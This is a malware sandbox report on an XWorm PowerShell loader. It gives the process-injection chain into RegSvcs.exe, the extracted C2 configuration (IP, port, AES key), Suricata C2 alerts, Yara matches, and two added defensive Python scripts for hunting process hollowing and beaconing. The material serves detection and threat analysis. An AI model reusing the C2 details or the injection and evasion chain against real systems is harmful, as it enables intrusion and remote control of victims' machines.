Windows Analysis Report
mhqxUdpe7V.ps1

Overview

General Information

Sample name: mhqxUdpe7V.ps1 (renamed because the original name is a hash value)
Original sample name: 372ad160c5b235ae768490e898860d6797ba74b1ed8106496ffc5a7c1ccd464e.ps1
Analysis ID: 1577168
MD5: d8e887ed6c14e9b9279b739aea8bb613
SHA1: d5d2ade0c4896b1e7fc6318ec97dbb49ee1cb071
SHA256: 372ad160c5b235ae768490e898860d6797ba74b1ed8106496ffc5a7c1ccd464e
Tags: 92-255-57-155, ps1, user-JAMESWT_MHT

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Uses ipconfig to lookup or modify the Windows network settings
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 3600 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mhqxUdpe7V.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ipconfig.exe (PID: 1820 cmdline: "C:\Windows\system32\ipconfig.exe" /flushdns MD5: 62F170FB07FDBB79CEB7147101406EB8)
    • RegSvcs.exe (PID: 3352 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
{"C2 url": ["92.255.57.155"], "Port": 4411, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
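The process tree above is the chain a detection engineer would hunt for: powershell.exe started with -ExecutionPolicy unrestricted -file (what the Sigma hit "Change PowerShell Policies to an Insecure Level" keys on; the execution policy is not a security boundary, so this is a telemetry hint rather than a bypass of a control), a child ipconfig /flushdns, and a child RegSvcs.exe launched with an empty argument list, which the Yara hit at 4.2.RegSvcs.exe.400000 and the "Injects a PE file into a foreign process" signature show was hollowed with the XWorm payload. The following is an added example and not part of the Joe Sandbox report: a small Python matcher over constructed records shaped like Sysmon Event ID 1 (ProcessCreate) and Event ID 10 (ProcessAccess). The records, their PIDs and the benign control entry are constructed to mirror the report's tree, not real logs; the list of argument-less .NET utilities treated as hollowing targets and the access-mask test are the author's assumptions.

```python
import re

# Constructed sample records shaped like Sysmon Event ID 1 (ProcessCreate) and
# Event ID 10 (ProcessAccess). PIDs, images and command lines mirror the report's
# process tree; the cmd.exe/RegSvcs.exe pair is a benign control. Not real logs.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 3600, "ParentProcessId": 3504,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mhqxUdpe7V.ps1"'},
    {"EventID": 1, "ProcessId": 1820, "ParentProcessId": 3600,
     "Image": r"C:\Windows\system32\ipconfig.exe",
     "CommandLine": r'"C:\Windows\system32\ipconfig.exe" /flushdns'},
    {"EventID": 1, "ProcessId": 3352, "ParentProcessId": 3600,
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"'},
    {"EventID": 10, "SourceProcessId": 3600, "TargetProcessId": 3352,
     "SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetImage": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "GrantedAccess": "0x1FFFFF"},
    # Benign control: an administrator registering a component with RegSvcs from cmd.exe.
    {"EventID": 1, "ProcessId": 4000, "ParentProcessId": 900,
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe"'},
    {"EventID": 1, "ProcessId": 4100, "ParentProcessId": 4000,
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" C:\app\MyService.dll'},
]

# -ExecutionPolicy / -ep followed by Unrestricted or Bypass.
INSECURE_POLICY = re.compile(r"-e\w*\s+(unrestricted|bypass)\b", re.IGNORECASE)

# .NET utilities that do nothing useful without an argument; an empty argv is a
# classic sign they were started only to be hollowed (assumed list).
HOLLOW_TARGETS = ("regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe")

# PROCESS_CREATE_THREAD (0x2) | PROCESS_VM_OPERATION (0x8) | PROCESS_VM_WRITE (0x20)
INJECT_ACCESS_BITS = 0x2A


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def _argv_after_image(cmdline):
    """Strip the (possibly quoted) image path and return the remaining arguments."""
    m = re.match(r'\s*(?:"[^"]+"|\S+)\s*(.*)$', cmdline)
    return m.group(1).strip() if m else cmdline


def hunt(events):
    """Return a list of (rule_name, pid) findings; several rules may fire for one pid."""
    findings = []
    by_pid = {e["ProcessId"]: e for e in events if e["EventID"] == 1}
    for e in events:
        if e["EventID"] == 1:
            img = _basename(e["Image"])
            args = _argv_after_image(e["CommandLine"])
            parent = by_pid.get(e["ParentProcessId"])
            parent_img = _basename(parent["Image"]) if parent else ""
            if img == "powershell.exe" and INSECURE_POLICY.search(args):
                findings.append(("powershell_insecure_execution_policy", e["ProcessId"]))
            if img in HOLLOW_TARGETS and args == "":
                findings.append(("dotnet_utility_without_arguments", e["ProcessId"]))
                if parent_img == "powershell.exe":
                    findings.append(("powershell_spawned_hollow_target", e["ProcessId"]))
            if img == "ipconfig.exe" and "/flushdns" in args.lower() and parent_img == "powershell.exe":
                findings.append(("powershell_flushdns", e["ProcessId"]))
        elif e["EventID"] == 10:
            src, tgt = _basename(e["SourceImage"]), _basename(e["TargetImage"])
            access = int(e["GrantedAccess"], 16)
            # A handle with thread-creation or memory-write rights from PowerShell
            # into one of the hollowing targets is the "writes to foreign memory" step.
            if src == "powershell.exe" and tgt in HOLLOW_TARGETS and access & INJECT_ACCESS_BITS:
                findings.append(("powershell_writes_into_hollow_target", e["TargetProcessId"]))
    return findings


if __name__ == "__main__":
    for rule, pid in hunt(SAMPLE_EVENTS):
        print(f"{rule:40s} pid={pid}")
```

The argument-less check is what separates the hollowed RegSvcs.exe (PID 3352) from the benign control (PID 4100), which carries an assembly path; on its own, a RegSvcs.exe launch is too common to alert on.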
Source | Rule | Description | Author | Strings
00000004.00000002.3913764509.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000004.00000002.3913764509.0000000000402000.00000040.00000400.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xaa5c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xaaf9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xac0e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xa81e:$cnc4: POST / HTTP/1.1
00000000.00000002.1483546758.000001AC16DFF000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.1483546758.000001AC16DFF000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x55a9c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x55b39:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x55c4e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x5585e:$cnc4: POST / HTTP/1.1
00000000.00000002.1483546758.000001AC16083000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security

Source | Rule | Description | Author | Strings
0.2.powershell.exe.1ac16030578.2.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.2.powershell.exe.1ac16e49e40.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.2.powershell.exe.1ac16030578.2.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x8e5c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8ef9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x900e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x8c1e:$cnc4: POST / HTTP/1.1
0.2.powershell.exe.1ac16e49e40.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x8e5c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8ef9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x900e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x8c1e:$cnc4: POST / HTTP/1.1
4.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security

              System Summary

Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mhqxUdpe7V.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mhqxUdpe7V.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mhqxUdpe7V.ps1", ProcessId: 3600, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mhqxUdpe7V.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mhqxUdpe7V.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mhqxUdpe7V.ps1", ProcessId: 3600, ProcessName: powershell.exe
Suricata alerts (columns: Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol).
All 52 rows below share: SID 2852870 | Severity 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP. Timestamps:
2024-12-18T08:15:44.383553+0100
2024-12-18T08:15:55.993778+0100
2024-12-18T08:15:58.442744+0100
2024-12-18T08:16:07.619210+0100
2024-12-18T08:16:19.244265+0100
2024-12-18T08:16:28.596948+0100
2024-12-18T08:16:30.869806+0100
2024-12-18T08:16:35.540659+0100
2024-12-18T08:16:35.775609+0100
2024-12-18T08:16:35.966382+0100
2024-12-18T08:16:37.275818+0100
2024-12-18T08:16:47.024809+0100
2024-12-18T08:16:51.681721+0100
2024-12-18T08:16:51.872600+0100
2024-12-18T08:16:55.860763+0100
2024-12-18T08:16:58.870117+0100
2024-12-18T08:17:02.360638+0100
2024-12-18T08:17:07.338323+0100
2024-12-18T08:17:07.529526+0100
2024-12-18T08:17:07.798850+0100
2024-12-18T08:17:19.369699+0100
2024-12-18T08:17:28.636169+0100
2024-12-18T08:17:28.826358+0100
2024-12-18T08:17:30.009802+0100
2024-12-18T08:17:30.200715+0100
2024-12-18T08:17:30.366726+0100
2024-12-18T08:17:30.392547+0100
2024-12-18T08:17:30.683445+0100
2024-12-18T08:17:38.088186+0100
2024-12-18T08:17:41.526413+0100
2024-12-18T08:17:45.623108+0100
2024-12-18T08:17:57.260857+0100
2024-12-18T08:17:58.430043+0100
2024-12-18T08:18:08.930832+0100
2024-12-18T08:18:12.401150+0100
2024-12-18T08:18:12.591925+0100
2024-12-18T08:18:12.713869+0100
2024-12-18T08:18:15.259849+0100
2024-12-18T08:18:18.994275+0100
2024-12-18T08:18:23.072270+0100
2024-12-18T08:18:28.444810+0100
2024-12-18T08:18:34.833814+0100
2024-12-18T08:18:36.479150+0100
2024-12-18T08:18:37.871432+0100
2024-12-18T08:18:45.510717+0100
2024-12-18T08:18:57.135572+0100
2024-12-18T08:18:58.456985+0100
2024-12-18T08:19:08.793859+0100
2024-12-18T08:19:17.112172+0100
2024-12-18T08:19:21.167141+0100
2024-12-18T08:19:28.446368+0100
2024-12-18T08:19:30.432749+0100
Suricata alerts (columns: Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol).
All 43 rows below share: SID 2852923 | Severity 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP. Timestamps:
2024-12-18T08:15:44.423184+0100
2024-12-18T08:15:55.995603+0100
2024-12-18T08:16:07.622697+0100
2024-12-18T08:16:19.246948+0100
2024-12-18T08:16:30.871894+0100
2024-12-18T08:16:35.586657+0100
2024-12-18T08:16:35.777466+0100
2024-12-18T08:16:35.971330+0100
2024-12-18T08:16:37.278095+0100
2024-12-18T08:16:47.027279+0100
2024-12-18T08:16:51.687517+0100
2024-12-18T08:16:51.874949+0100
2024-12-18T08:16:55.863013+0100
2024-12-18T08:17:02.363894+0100
2024-12-18T08:17:07.430548+0100
2024-12-18T08:17:07.550481+0100
2024-12-18T08:17:07.804066+0100
2024-12-18T08:17:19.371972+0100
2024-12-18T08:17:28.828701+0100
2024-12-18T08:17:30.202778+0100
2024-12-18T08:17:30.371295+0100
2024-12-18T08:17:30.491088+0100
2024-12-18T08:17:30.778035+0100
2024-12-18T08:17:38.091676+0100
2024-12-18T08:17:41.528389+0100
2024-12-18T08:17:45.634389+0100
2024-12-18T08:17:57.263162+0100
2024-12-18T08:18:08.932951+0100
2024-12-18T08:18:12.403176+0100
2024-12-18T08:18:12.594444+0100
2024-12-18T08:18:12.715630+0100
2024-12-18T08:18:15.262040+0100
2024-12-18T08:18:18.999823+0100
2024-12-18T08:18:23.074203+0100
2024-12-18T08:18:34.838093+0100
2024-12-18T08:18:36.481824+0100
2024-12-18T08:18:37.874173+0100
2024-12-18T08:18:45.514127+0100
2024-12-18T08:18:57.141141+0100
2024-12-18T08:19:08.800193+0100
2024-12-18T08:19:17.253400+0100
2024-12-18T08:19:21.168994+0100
2024-12-18T08:19:30.433858+0100
Suricata alerts (columns: Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol):
2024-12-18T08:15:58.442744+0100 | 2858801 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP
Suricata alerts (columns: Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol):
2024-12-18T08:18:22.639364+0100 | 2858799 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP
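The outbound check-in alerts (SID 2852923) start at a near-constant period, which is the implant's keep-alive cadence; the sub-second clusters later in the same table are command/response exchanges riding on top of it, so a beacon period should be measured on a quiet stretch. The following is an added example, not part of the Joe Sandbox report: it takes the first five outbound check-in timestamps copied from the table above and computes the median interval and whether the gaps are regular, the two figures a netflow or Zeek beaconing query would be keyed on. The 10% jitter tolerance and the 2-second burst threshold are assumed thresholds, not values the report states.

```python
from datetime import datetime
from statistics import median

# First five outbound check-in timestamps copied from the report's SID 2852923
# rows (192.168.2.9:49705 -> 92.255.57.155:4411).
CHECKIN_TIMESTAMPS = [
    "2024-12-18T08:15:44.423184+0100",
    "2024-12-18T08:15:55.995603+0100",
    "2024-12-18T08:16:07.622697+0100",
    "2024-12-18T08:16:19.246948+0100",
    "2024-12-18T08:16:30.871894+0100",
]


def parse_ts(s):
    """Parse the report's ISO-8601 timestamp (microseconds, numeric UTC offset)."""
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S.%f%z")


def intervals(timestamps):
    """Seconds between consecutive alerts, in chronological order."""
    ts = sorted(parse_ts(s) for s in timestamps)
    return [(later - earlier).total_seconds() for earlier, later in zip(ts, ts[1:])]


def beacon_profile(timestamps, jitter_tolerance=0.10):
    """Return (median_interval_seconds, is_regular).

    is_regular is True when every gap lies within jitter_tolerance (a fraction of
    the median) of the median, i.e. the traffic looks like a fixed-period
    keep-alive rather than interactive command traffic. The 10% tolerance is an
    assumed threshold."""
    gaps = intervals(timestamps)
    if not gaps:
        return 0.0, False
    med = median(gaps)
    regular = all(abs(g - med) <= jitter_tolerance * med for g in gaps)
    return med, regular


def split_keepalive_and_bursts(timestamps, burst_threshold=2.0):
    """Split gaps into keep-alive-like (>= threshold) and burst (< threshold).

    Sub-second gaps, as in the later rows of the report's table, are operator
    command/response exchanges layered on the periodic check-in; they must be
    excluded before estimating the beacon period. The threshold is assumed."""
    gaps = intervals(timestamps)
    keepalive = [g for g in gaps if g >= burst_threshold]
    bursts = [g for g in gaps if g < burst_threshold]
    return keepalive, bursts


if __name__ == "__main__":
    med, regular = beacon_profile(CHECKIN_TIMESTAMPS)
    print(f"median check-in interval: {med:.2f}s, regular={regular}")
```

On the five timestamps above the interval is about 11.6 seconds with well under 1% jitter, which is the value to feed a "same source/destination pair, N connections at period T" query when hunting for other hosts talking to 92.255.57.155:4411.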


              AV Detection

Source: 00000000.00000002.1483546758.000001AC16083000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: Xworm {"C2 url": ["92.255.57.155"], "Port": 4411, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: mhqxUdpe7V.ps1; Virustotal: Detection: 9%
Source: mhqxUdpe7V.ps1; ReversingLabs: Detection: 13%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack; String decryptor: 92.255.57.155
Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack; String decryptor: 4411
Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack; String decryptor: P0WER
Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack; String decryptor: <Xwormmm>
Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack; String decryptor: XWorm V5.6
Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack; String decryptor: USB.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user

              Networking

Source: Network traffic; Suricata IDS: 2858800 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.9:49705 -> 92.255.57.155:4411
Source: Network traffic; Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 92.255.57.155:4411 -> 192.168.2.9:49705
Source: Network traffic; Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.9:49705 -> 92.255.57.155:4411
Source: Network traffic; Suricata IDS: 2858801 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 92.255.57.155:4411 -> 192.168.2.9:49705
Source: Network traffic; Suricata IDS: 2858799 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.9:49705 -> 92.255.57.155:4411
Source: Malware configuration extractor; URLs: 92.255.57.155
Source: global traffic; TCP traffic: 192.168.2.9:49705 -> 92.255.57.155:4411
Source: Joe Sandbox View; ASN Name: TELSPRU TELSPRU
Source: unknown; TCP traffic detected without corresponding DNS query: 92.255.57.155 (this entry is repeated 50 times in the report)
Source: powershell.exe, 00000000.00000002.1504821903.000001AC25E46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1483546758.000001AC1700A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1483546758.000001AC15E57000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1483546758.000001AC15C31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3916503959.0000000003101000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1483546758.000001AC15E57000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1483546758.000001AC15C31000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1483546758.000001AC1700A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1483546758.000001AC1700A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1483546758.000001AC1700A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1483546758.000001AC15E57000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1483546758.000001AC163FF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1504821903.000001AC25E46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1483546758.000001AC1700A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window created: window name: CLIPBRDWNDCLASS

              System Summary

              Source: 0.2.powershell.exe.1ac16030578.2.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.powershell.exe.1ac16e49e40.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
              Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000004.00000002.3913764509.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000000.00000002.1483546758.000001AC16DFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000000.00000002.1483546758.000001AC16083000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000000.00000002.1483546758.000001AC15E57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process Stats: CPU usage > 49%
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_015EC2D8 4_2_015EC2D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_015EB598 4_2_015EB598
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_015E6498 4_2_015E6498
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_015E8618 4_2_015E8618
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_015E5BC8 4_2_015E5BC8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_015E5880 4_2_015E5880
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_015E0FA0 4_2_015E0FA0
              Source: 0.2.powershell.exe.1ac16030578.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.powershell.exe.1ac16e49e40.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000004.00000002.3913764509.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000002.1483546758.000001AC16DFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000002.1483546758.000001AC16083000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000002.1483546758.000001AC15E57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, 8zNojDlPt46QazeXuL2Y6OFYWD4q0R1PB0Jr.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.cs | Cryptographic APIs: 'TransformFinalBlock'
